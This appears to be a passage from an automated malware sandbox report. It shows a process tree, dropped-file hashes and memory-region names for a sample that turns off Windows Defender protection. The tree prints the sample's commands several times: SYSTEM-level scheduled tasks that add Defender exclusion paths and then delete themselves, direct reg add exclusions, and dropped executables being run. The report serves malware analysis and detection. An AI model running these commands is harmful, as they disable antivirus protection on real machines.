                              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                              3⤵
                              • Indicator Removal: Clear Persistence
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:992
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Scheduled Task/Job: Scheduled Task
                                PID:4400
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Run /TN "Task1"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:2128
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Delete /TN "Task1" /F
                                4⤵
                                  PID:5124
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                3⤵
                                • Indicator Removal: Clear Persistence
                                PID:1844
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:2884
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Run /TN "Task1"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:5364
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Delete /TN "Task1" /F
                                  4⤵
                                    PID:5404
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                  3⤵
                                  • Indicator Removal: Clear Persistence
                                  • System Location Discovery: System Language Discovery
                                  PID:5352
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                    4⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:6828
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Run /TN "Task1"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5436
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Delete /TN "Task1" /F
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5300
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                  3⤵
                                  • Indicator Removal: Clear Persistence
                                  PID:5460
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:5132
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Run /TN "Task1"
                                    4⤵
                                      PID:5468
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Delete /TN "Task1" /F
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:5524
                              • C:\Windows\system32\cmd.exe
                                cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\bDTBuo" /t REG_DWORD /d 0 /f
                                1⤵
                                • Executes a command shell one-liner
                                PID:4896
                                • C:\Windows\system32\reg.exe
                                  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\bDTBuo" /t REG_DWORD /d 0 /f
                                  2⤵
                                  • Windows security bypass
                                  PID:5416
                              • C:\Users\Public\bDTBuo\jBgiZS.exe
                                "C:\Users\Public\bDTBuo\jBgiZS.exe"
                                1⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:2608
                              • C:\Windows\system32\cmd.exe
                                cmd.exe
                                1⤵
                                  PID:5168
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:5408
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:5508
                                • C:\Program Files (x86)\9666z81\molEOih7.exe
                                  "C:\Program Files (x86)\9666z81\molEOih7.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:1220
                                • C:\Program Files (x86)\hL2VvT\PhIC7V.exe
                                  "C:\Program Files (x86)\hL2VvT\PhIC7V.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  PID:6272
                                • C:\Program Files (x86)\hL2VvT\PhIC7V.exe
                                  "C:\Program Files (x86)\hL2VvT\PhIC7V.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  PID:6280
                                • C:\Program Files (x86)\9666z81\molEOih7.exe
                                  "C:\Program Files (x86)\9666z81\molEOih7.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:1652
                                • C:\Program Files (x86)\hL2VvT\PhIC7V.exe
                                  "C:\Program Files (x86)\hL2VvT\PhIC7V.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:6312
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\hL2VvT" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  PID:2824
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\hL2VvT" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:7140
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  PID:1932
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:5476
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  PID:5456
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:5584

                                Network

                                      MITRE ATT&CK Enterprise v16

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      XPSPLOG.dll

                                      • Path C:\Program Files (x86)\9666z81\XPSPLOG.dll
                                      • Size 4.6MB
                                      • SHA256 6274afbde935d50d51fb96018772fb2cc770228f21cff42bccdbae3a5b574c49
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      image.png

                                      • Path C:\Program Files (x86)\9666z81\image.png
                                      • Size 5.0MB
                                      • SHA256 cbf7b17d49fe8cefefc977a6a6782c906e805870d691fa06f432a8c7254252d2
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      PhIC7V.exe

                                      • Path C:\Program Files (x86)\hL2VvT\PhIC7V.exe
                                      • Size 145KB
                                      • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      XPSPLOG.dll

                                      • Path C:\Program Files (x86)\hL2VvT\XPSPLOG.dll
                                      • Size 4.6MB
                                      • SHA256 6b2afa56063ea8c2e06b54b66094faf753728819eb6f5f90774beb8a0c7d5bea
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      image.png

                                      • Path C:\Program Files (x86)\hL2VvT\image.png
                                      • Size 5.0MB
                                      • SHA256 a0644bd4ae476dd4fab4e3424fbc2b10c6d8fb884668cbb8a5750b14661dd935
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      thumbs.db

                                      • Path C:\Program Files (x86)\hL2VvT\thumbs.db
                                      • Size 358KB
                                      • SHA256 7f42a3fdb98420567ba8fe27951451b5dc31462f0fbd846dd2302815ccfb2b89
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      powershell.exe.log

                                      • Path C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                      • Size 2KB
                                      • SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
                                      • MD5 SHA1 SHA512 TLSH

                                      StartupProfileData-NonInteractive

                                      • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      • Size 18KB
                                      • SHA256 9a4c1796bab163602272948c7fe826674b4216762c12656c8abb9d1a2a2a599f
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      __PSScriptPolicyTest_03nritzi.stx.ps1

                                      • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_03nritzi.stx.ps1
                                      • Size 60B
                                      • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                      • MD5 SHA1 SHA512 TLSH

                                      destopbak.ini

                                      • Path C:\Users\Public\Music\destopbak.ini
                                      • Size 2B
                                      • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                      • MD5 SHA1 SHA512

                                      UxEnhance64.dll

                                      • Path C:\Users\Public\bDTBuo\UxEnhance64.dll
                                      • Size 3.1MB
                                      • SHA256 09157857d0c6a3a4908f86c5caae2dc1e4343f58c10a56eaa71efeee888a3ac6
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      adoresd.dat

                                      • Path C:\Users\Public\bDTBuo\adoresd.dat
                                      • Size 4.7MB
                                      • SHA256 4f96ac71690bd48758ff977833bae2168617329341decb38370805decbb491f6
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      jBgiZS.exe

                                      • Path C:\Users\Public\bDTBuo\jBgiZS.exe
                                      • Size 135KB
                                      • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      msadox.tb

                                      • Path C:\Users\Public\bDTBuo\msadox.tb
                                      • Size 8KB
                                      • SHA256 b5239c9972a2eb105f0140b1de9a51b543c7399daf9afeaa3e1302a4f82b2b9d
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      memory/1220-722-0x0000000000D20000-0x0000000000D21000-memory.dmp

                                      memory/1220-723-0x0000000073B30000-0x000000007427A000-memory.dmp

                                      memory/1220-727-0x0000000003540000-0x0000000003D47000-memory.dmp

                                      memory/1220-730-0x0000000003540000-0x0000000003D47000-memory.dmp

                                      memory/1220-733-0x0000000000D20000-0x0000000000D21000-memory.dmp

                                      memory/1220-729-0x0000000000D50000-0x0000000000D51000-memory.dmp

                                      memory/1352-559-0x000002294F430000-0x000002294F4BA000-memory.dmp

                                      memory/1352-556-0x000002294F430000-0x000002294F4BA000-memory.dmp

                                      memory/1352-557-0x000002294F430000-0x000002294F4BA000-memory.dmp

                                      memory/1352-555-0x000002294EFC0000-0x000002294F00E000-memory.dmp

                                      memory/1352-550-0x000002294E700000-0x000002294EF91000-memory.dmp

                                      memory/1352-565-0x000002294E700000-0x000002294EF91000-memory.dmp

                                      memory/1352-564-0x000002294E700000-0x000002294EF91000-memory.dmp

                                      memory/1352-530-0x00007FF8D6810000-0x00007FF8D6812000-memory.dmp

                                      memory/1352-531-0x00007FF8B7EF0000-0x00007FF8B840E000-memory.dmp

                                      memory/1352-536-0x000002294E700000-0x000002294EF91000-memory.dmp

                                      memory/1352-538-0x00007FF8D6820000-0x00007FF8D6822000-memory.dmp

                                      memory/1352-558-0x000002294F430000-0x000002294F4BA000-memory.dmp

                                      memory/1352-544-0x000002294E700000-0x000002294EF91000-memory.dmp

                                      memory/1352-546-0x000002294E700000-0x000002294EF91000-memory.dmp

                                      memory/1352-545-0x000002294E700000-0x000002294EF91000-memory.dmp

                                      memory/1352-543-0x000002294E700000-0x000002294EF91000-memory.dmp

                                      memory/1352-540-0x000002294E700000-0x000002294EF91000-memory.dmp

                                      memory/1652-738-0x00000000008F0000-0x00000000008F1000-memory.dmp

                                      memory/1652-739-0x0000000073B30000-0x000000007427A000-memory.dmp

                                      memory/1652-742-0x0000000003030000-0x0000000003837000-memory.dmp

                                      memory/1652-756-0x00000000008F0000-0x00000000008F1000-memory.dmp

                                      memory/1652-751-0x0000000003030000-0x0000000003837000-memory.dmp

                                      memory/1652-750-0x0000000000B30000-0x0000000000B31000-memory.dmp

                                      memory/2100-768-0x00000000058A0000-0x00000000058C2000-memory.dmp

                                      memory/2100-792-0x00000000081D0000-0x000000000884A000-memory.dmp

                                      memory/2100-800-0x0000000007EB0000-0x0000000007EB8000-memory.dmp

                                      memory/2100-799-0x0000000007ED0000-0x0000000007EEA000-memory.dmp

                                      memory/2100-798-0x0000000007DD0000-0x0000000007DE4000-memory.dmp

                                      memory/2100-797-0x0000000007DC0000-0x0000000007DCE000-memory.dmp

                                      memory/2100-796-0x0000000007D90000-0x0000000007DA1000-memory.dmp

                                      memory/2100-795-0x0000000007E10000-0x0000000007EA6000-memory.dmp

                                      memory/2100-794-0x0000000007C00000-0x0000000007C0A000-memory.dmp

                                      memory/2100-793-0x0000000007B90000-0x0000000007BAA000-memory.dmp

                                      memory/2100-781-0x0000000006E30000-0x0000000006E62000-memory.dmp

                                      memory/2100-782-0x0000000073BB0000-0x0000000073BFC000-memory.dmp

                                      memory/2100-791-0x0000000007A30000-0x0000000007AD3000-memory.dmp

                                      memory/2100-790-0x0000000006E10000-0x0000000006E2E000-memory.dmp

                                      memory/2100-779-0x0000000006860000-0x000000000687E000-memory.dmp

                                      memory/2100-780-0x00000000068F0000-0x000000000693C000-memory.dmp

                                      memory/2100-776-0x0000000006290000-0x00000000065E4000-memory.dmp

                                      memory/2100-770-0x0000000006220000-0x0000000006286000-memory.dmp

                                      memory/2100-769-0x00000000060C0000-0x0000000006126000-memory.dmp

                                      memory/2100-767-0x0000000005A20000-0x0000000006048000-memory.dmp

                                      memory/2100-766-0x00000000052A0000-0x00000000052D6000-memory.dmp

                                      memory/2608-595-0x00007FF8D6810000-0x00007FF8D6812000-memory.dmp

                                      memory/2608-584-0x000001E4BC2F0000-0x000001E4BCB81000-memory.dmp

                                      memory/2608-593-0x000001E4BC2F0000-0x000001E4BCB81000-memory.dmp

                                      memory/2608-594-0x000001E4BC2F0000-0x000001E4BCB81000-memory.dmp

                                      memory/2608-586-0x00007FF8D6820000-0x00007FF8D6822000-memory.dmp

                                      memory/2608-592-0x000001E4BC2F0000-0x000001E4BCB81000-memory.dmp

                                      memory/2608-591-0x000001E4BC2F0000-0x000001E4BCB81000-memory.dmp

                                      memory/2608-587-0x000001E4BC2F0000-0x000001E4BCB81000-memory.dmp

                                      memory/2608-581-0x00007FF8B7EF0000-0x00007FF8B840E000-memory.dmp

                                      memory/3656-0-0x00000000001E0000-0x00000000001EE000-memory.dmp

                                      memory/3656-525-0x00007FF8C74A0000-0x00007FF8C74B0000-memory.dmp

                                      memory/3656-1-0x00000000001E0000-0x00000000001EE000-memory.dmp

                                      memory/3656-504-0x00007FF8C74A0000-0x00007FF8C74B0000-memory.dmp

                                      memory/3656-2-0x00000000001F0000-0x00000000001FC000-memory.dmp

                                      memory/3656-524-0x00000000001E0000-0x00000000001EE000-memory.dmp

                                      memory/5776-685-0x0000000003AE0000-0x0000000003AF4000-memory.dmp

                                      memory/5776-686-0x00000000031D0000-0x00000000039D7000-memory.dmp

                                      memory/5776-678-0x00000000031D0000-0x00000000039D7000-memory.dmp

                                      memory/5776-666-0x0000000000AF0000-0x0000000000AF1000-memory.dmp

                                      memory/5776-735-0x00000000031D0000-0x00000000039D7000-memory.dmp

                                      memory/5776-673-0x0000000000B10000-0x0000000000B11000-memory.dmp

                                      memory/5776-667-0x00000000750B0000-0x00000000757FA000-memory.dmp

                                      memory/5776-674-0x00000000031D0000-0x00000000039D7000-memory.dmp

                                      memory/5776-671-0x00000000031D0000-0x00000000039D7000-memory.dmp

                                      memory/5776-713-0x00000000031D0000-0x00000000039D7000-memory.dmp

                                      memory/5776-691-0x0000000010000000-0x0000000010061000-memory.dmp

                                      memory/6028-810-0x0000000005CD0000-0x0000000006024000-memory.dmp

                                      memory/6028-814-0x00000000064E0000-0x000000000652C000-memory.dmp

                                      memory/6028-823-0x0000000007670000-0x0000000007713000-memory.dmp

                                      memory/6028-815-0x000000006F470000-0x000000006F4BC000-memory.dmp

                                      memory/6028-824-0x00000000079D0000-0x00000000079E1000-memory.dmp

                                      memory/6312-754-0x0000000002D00000-0x0000000003507000-memory.dmp

                                      memory/6312-765-0x00000000005D0000-0x00000000005D1000-memory.dmp

                                      memory/6312-746-0x00000000005D0000-0x00000000005D1000-memory.dmp

                                      memory/6312-747-0x00000000750B0000-0x00000000757FA000-memory.dmp

                                      memory/6312-762-0x0000000002D00000-0x0000000003507000-memory.dmp

                                      memory/6312-761-0x00000000009E0000-0x00000000009E1000-memory.dmp